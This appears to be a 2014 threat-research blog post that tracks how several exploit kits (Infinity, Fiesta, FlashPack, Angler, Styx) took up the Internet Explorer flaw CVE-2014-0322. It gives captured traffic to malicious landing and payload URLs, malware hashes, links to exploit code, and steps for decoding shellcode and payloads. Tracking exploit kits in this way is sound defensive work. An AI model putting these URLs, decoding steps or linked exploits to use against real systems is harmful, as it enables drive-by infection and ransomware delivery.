It took more times than I thought, but here we are : CVE-2014-0322 is now in Exploit Kit. Seems to be first in
Infinity EK :
Thanks Timo Hirvonen for fixing my ugly approach to that one.
 |
| Successful pass in Win7 with Flash and ante kb2925418 2014-03-24 |
GET http://saarbangers-metal-festival .de/201403/br/573133020.htm
200 OK (text/html)
 |
| Piece of Encoded CVE-2014-0322 and call for helper http://pastebin.com/4dYArqEH |
 |
| CVE-2014-0322 after deobfus http://pastebin.com/VzHCR56A |
GET http://saarbangers-metal-festival .de/swf.swf
200 OK (application/x-shockwave-flash) e8693573caecf1cab91aa578e1d62ab0 Swt Helper
GET http://saarbangers-metal-festival .de/6084.swf
200 OK (application/x-shockwave-flash) CVE-2013-0634
GET http://saarbangers-metal-festival .de/6084.swf
200 OK (application/x-shockwave-flash)
GET http://saarbangers-metal-festival .de/9073.mp3?rnd=75091
200 OK (application/x-msdownload)
GET http://saarbangers-metal-festival .de/9073.mp3?rnd=60183
200 OK (application/x-msdownload)
Files :2 fiddlers (OwnCloud)
You'll find a pcap too on the nice Traffic Malware Analysis.
Fiesta :
2014-03-25 - Thanks EKWatcher for Referer. |
| Fiesta : Successful pass in Win7 IE10 with Flash and ante kb2925418 2014-03-25 |
GET http://bgpjterlrw.no-ip .info/mycxql2/counter.php?id=2
301 Redirect to http://bgpjterlrw.no-ip.info/mycxql2/?2
GET http://bgpjterlrw.no-ip .info/mycxql2/?2
200 OK (text/html) http://pastebin.com/mxWFtG83
GET http://bgpjterlrw.no-ip .info/mycxql2/?1723d0e41c0f5f6458545f08560b54050501050b5f0407040a0201005509060705
200 OK (text/html) http://pastebin.com/znN5J1nU <- CVE-2014-0322
 |
| Partial Decoding of the components to exploit CVE-2014-0322 |
"Ladyr" : Once Deobfuscated : http://pastebin.com/qVafD361
"Felt" Shellcode : http://pastebin.com/w22nNLg8
Following EKWatcher guidelines :
Base64 decode on the "Felt" parameter
 |
| piece of Base64decode (felt) |
 |
| in diStorm |
or send the output online (thanks Ben Layer)
http://www.onlinedisassembler.com/odaweb/CIUwSY
 |
| B64 decoded shellcode in online disassembler |
 |
| Xor 0x20 on B64 decoded "Felt" parameter |
GET http://bgpjterlrw.no-ip .info/mycxql2/?533de2b2f35a74c55c50555f570953030105045c5e0600020e060057540b010102
200 OK (application/x-shockwave-flash) 881a4d9fd2902e0af4e4a06bbc6ba63a <- Flash Helper
GET http://bgpjterlrw.no-ip .info/mycxql2/?1f210081f3d41f5b5216590a020b0900055005090b045a010a53010201095b0206;7
200 OK (application/octet-stream) - 98f29794b29c7a90cfc6af778a3d503c Redyms/Ramdo
Files : Fiddler
FlashPack :
 |
| Successful CVE-2014-0322 pass in FlashPack : 2014-03-27 |
GET http://sldhuskd.fdshfghtsffdfdg .net/probdrew/vertes/allow.php
200 OK (text/html)
GET http://sldhuskd.fdshfghtsffdfdg .net/probdrew/vertes/js/pd.php?id=68656c6c6f303332322e636f6d
200 OK (text/html)
POST http://sldhuskd.fdshfghtsffdfdg .net/probdrew/vertes/get_json.php
200 OK (text/html)
GET http://sldhuskd.fdshfghtsffdfdg .net/probdrew/vertes/msie.php
200 OK (text/html) <-- CVE-2013-2551
GET http://sldhuskd.fdshfghtsffdfdg .net/probdrew/vertes/link2jpg/index.php
200 OK (text/html)
 |
| http://pastebin.com/BxhPytN3 |
 |
| Code targeting CVE-2014-0322 in FlashPack http://pastebin.com/SKSQBwB7 |
200 OK (application/x-shockwave-flash) Flash Helper : f9e1338083a03d1b965ce8502c109372
GET http://sldhuskd.fdshfghtsffdfdg .net/probdrew/vertes/link2jpg/Erido.jpg
200 OK (image/jpeg)
Same file name and Xor key (95) as when this 0day has been first spotted live.
 |
| Erido.jpg after xor 95 pass. |
 |
| Dropped in %temp%\low |
kilensis.com /terkas/audio/loadmsie10.php
176.102.37.5543918 | 176.102.32.0/19 | IPSYSTEMS | UA | IPSYSTEMS.COM.UA | TK IPSYSTEMS LTD.
and here is the second file :
Files :Fiddler and samples (OwnCloud)
Angler EK :
 |
| Successfull pass for CVE-2014-0322 in Angler EK 2014-03-28 |
200 OK (text/html)
 |
| Piece of the code targeting CVE-2014-0322 in Angler EK 2014-03-28 http://pastebin.com/PqrdhTnK |
 |
| Why wasting time renaming functions ? |
GET http://callositfrenavisseque.teampac12 .com/2ZhNTwSvCb7q0rUMk1eeQBch4k8SW3YuQb72x92634nu21RH
200 OK (text/html) 7aeefe2f40d607df2c51b89f912d9b37
GET http://callositfrenavisseque.teampac12 .com/QNZhV37gKdfsOwXFL86KIlYIKGhDK4PXmb55GtwVhjzPf-HP
200 OK (application/octet-stream) 0d62ee4c2fe169a65cd2d9afde80b6bc (Reveton Ransomware)
Files : Landing,SWF,Encoded and Decoded Payload (see here for decoding)
Note : I know it's in Styx (See this : http://pastebin.com/Ya8kZihy )
This is the Styx from the guys who were pushing Kovter and Zaccess in Sakura till december 2013 who then switch to styx. But I do not have referer. Would love feedback on this.
Last known (to me) position :
2014/02/16 12:3x;goo6.payingmails.ostrowwlkp.pl;80;64.251.30.161
2014/02/16 12:3x;mami1.payingmails.ostrowwlkp.pl;80;64.251.30.161
2014/02/16 13:3x;alfad.magsforeveryone.ostrowwlkp.pl;80;64.251.30.161
2014/02/16 13:3x;kinov.magsforeveryone.ostrowwlkp.pl;80;64.251.30.161
2014/02/16 13:4x;wmczo.iaozu.ostrowwlkp.pl;80;64.251.30.162
2014/02/16 13:4x;shiyu.iaozu.ostrowwlkp.pl;80;64.251.30.162
2014/02/16 13:5x;opera.iaozu.ostrowwlkp.pl;80;64.251.30.162
2014/02/16 16:1x;talen.cncnc.ostrowwlkp.pl;80;64.251.30.162
2014/02/16 16:1x;asla.cncnc.ostrowwlkp.pl;80;64.251.30.162
Read More :
Emerging Threat: MS IE 10 Zero-Day (CVE-2014-0322) Use-After-Free Remote Code Execution Vulnerability - 2014-02-19 - Symantec
New Internet Explorer 10 Zero-Day Discovered in Watering Hole Attack - 2014-02-14 - Symantec